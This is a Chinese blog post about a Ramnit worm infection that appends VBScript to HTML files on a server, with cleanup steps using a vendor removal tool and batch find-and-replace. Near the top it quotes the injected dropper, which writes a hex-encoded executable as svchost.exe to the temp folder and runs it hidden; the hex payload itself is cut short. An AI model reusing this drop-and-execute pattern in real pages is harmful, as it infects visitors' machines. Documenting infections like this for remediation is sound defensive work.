蠕虫病毒html,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法
参考:
https://www.cnblogs.com/wuhairui/p/8297614.html
http://www.guopingblog.com/post/100.html
最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样
DropFileName = “svchost.exe”
WriteData =
“4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
到vps一看才发现 所有的 html 文件末尾都被加了一段这个代码把页面体积搞的很大 从而导致流量飙升,百度了一晚上没搞明白,第二天又搞了一天试过360杀毒根本没啥用,最后用赛门铁克的 Ramnit 蠕虫病毒 专杀工具给搞定了。下面说下解决方案
1、下载 赛门铁克的 Ramnit 蠕虫病毒 专杀工具
下载后直接运行 点 star 即可 全盘删完后会提示重启 点 yes 重启即可。
2、用专杀工具杀完以后随机检查了几个 html 文件发现还有那段代码,不过不会像之前自己手动删了 然后里面就又被自动加上了,这说明病毒已经被杀掉了可能是文件太多,专杀工具没有全都检测得到,不过没关系可以用批量查找替换工具 ultrareplace 把网站重新查找替换一下即可。
ultrareplace 下载地址:http://www.xiazaiba.com/html/4475.html
目前看上去是问题解决了,还需再观察几天,尽量不要在服务器下载运行来历不明的软件,及时打补丁安装防护工具。
首先表示强烈谴责,没事写出这种木马来。导致开发者把时间花在解决这种问题上。
这种木马会在你全盘的html文件的最底部生成一堆vbscript代码,导致html文件变得很大。大概213kb。可以看出他就是在恶搞。
如图:
你写好的html,过段时间就变成这样了。前端开发表示简直心态爆炸。
解决方案:
运行:
全盘扫描:
原文:https://www.cnblogs.com/wangyuman26/p/10868966.html
蠕虫病毒html,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法相关推荐
- html病毒DropFileName,王国平博客-HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...
最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样 DropFileName = "svchost.exe" Wri ...
- 赛门铁克杀html病毒,HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法...
参考: https://www.cnblogs.com/wuhairui/p/8297614.html http://www.guopingblog.com/post/100.html 最近发现vps ...
- 感染 <SCRIPT Language=VBScript> DropFileName = “svchost.exe” Ramnit 蠕虫病毒 HTML清除工具
最近开发一个web项目,html文件在尾部老是自动生成一串乱码,如下图 网上搜了下是电脑已经感染了Ramnit 蠕虫病毒,搜了一遍专杀工具各种收费,基本放弃.无奈电脑有太多东西,重装又浪费时间,时间成 ...
- phpstorm正则匹配清理被蠕虫病毒污染的html文件DropFileName = “svchost.exe” Ramnit
电脑中毒了,本地的html文件全部被蠕虫病毒感染了.本地所有项目里面的html文件全部被破坏了,里面都插入了一个脚本,DropFileName = "svchost.exe" Ra ...
- Win7 svchost.exe LOCAL_SERVICE占用CPU高的解决办法
使用环境(蓝色粗体字为特别注意内容) 1.软件环境:Windows7 32 bit 旗舰版 2.参考文献:①http://blog.sina.com.cn/s/blog_7bf0c30f0100sk2 ...
- DropFileName = “svchost.exe“ 问题解决方案
DropFileName = "svchost.exe" 问题解决方案 参考文章: (1)DropFileName = "svchost.exe" 问题解决方案 ...
- win7的svchost.exe占用内存过高如何解决
方法/步骤 1 在我的电脑上点击鼠标右键,选择[管理] 步骤阅读 2 选择右侧[服务和应用程序]下的[服务]选项 步骤阅读 3 找到名称我Superfetch的服务,双击鼠标左键. 步骤阅读 4 选择 ...
- 一个划时代的病毒“鬼影”袭击WinXP系统(重装无法清除)如何防范查杀?
电脑中毒怎么办?在此之前我们菜鸟级的都知道最常用最有效的除毒方法就是重装系统!但现在,这已经成为历史.就在今天3月15日,金山安全实验室捕获一种被命名为"鬼影"的电脑病毒,该病毒寄 ...
- 不小心关闭了explorer.exe进程,桌面变白解决办法
1.直接快捷键ctrl+shift+Esc调出任务管理器 2.文件中打开运行新任务,并输入explorer.exe确定即可.
最新文章
- 2017校赛 问题 F: 懒人得多动脑
- 【FPGA】单端口RAM的设计(异步读、异步写)
- 使用Aspose.Cells的基础知识整理
- PCL—点云分割(基于凹凸性) 低层次点云处理
- Java 8的6个问题
- git使用--提交代码
- python实例[判断操作系统类型]
- python 解析模块脚本_Python pexpect模块及shell脚本except原理解析
- mysql dump 二进制_mysqldump+二进制日志备份恢复
- 台大李宏毅Machine Learning 2017Fall学习笔记 (10)Tips for Deep Learning
- SQL Server数据库技术大全——15讲 死锁
- winform 实现qq代理_「设计模式」代理模式:神奇的代理模式,节省了我80%开发时间...
- 技嘉主板bios设置方法
- Geodesic flow kernel for unsupervised domain adaptation
- (Struts)ActionForm类及表单数据验证
- 我喜欢计算机作文450字,我喜欢的一种游戏作文450字(精选8篇)
- 全国哀悼日,网站变黑白的代码
- 点到直线的距离公式: 一元微积分
- 复制csdn或者博客园文章时,图片无法直接粘贴过来解决办法
- html中放大镜案列,HTML放大镜的一种实现及原理讲解(js)
热门文章
- 无线技术给网络插上飞翔的翅膀(转)
- 临时文件tempfile
- mysql的左右连接 分页_Java 与 Mysql连接,并分页显示
- RMAN backup
- 整体大于部分_格式塔心理咨询与治疗技术之争议话题:“整体大于部分之和”...
- 三菱无机房电梯故障代码查询_三菱无机房ELENESSA电梯故障代码表
- WolframAlpha
- x264 自适应量化模式 (AQ Adaptive Quantization) 初探
- 织梦DedeCMS在自定义表单里加入验证码的方法
- spring的设计初衷,BOP 编程伊始,依赖注入的基本概念,AOP 编程理念